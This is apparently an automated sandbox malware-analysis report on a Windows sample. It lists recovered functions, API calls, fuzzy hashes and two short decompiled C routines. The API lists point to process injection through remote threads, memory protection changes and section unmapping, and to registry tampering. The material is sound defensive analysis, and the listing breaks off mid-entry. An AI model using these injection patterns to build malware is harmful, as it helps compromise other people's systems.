  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
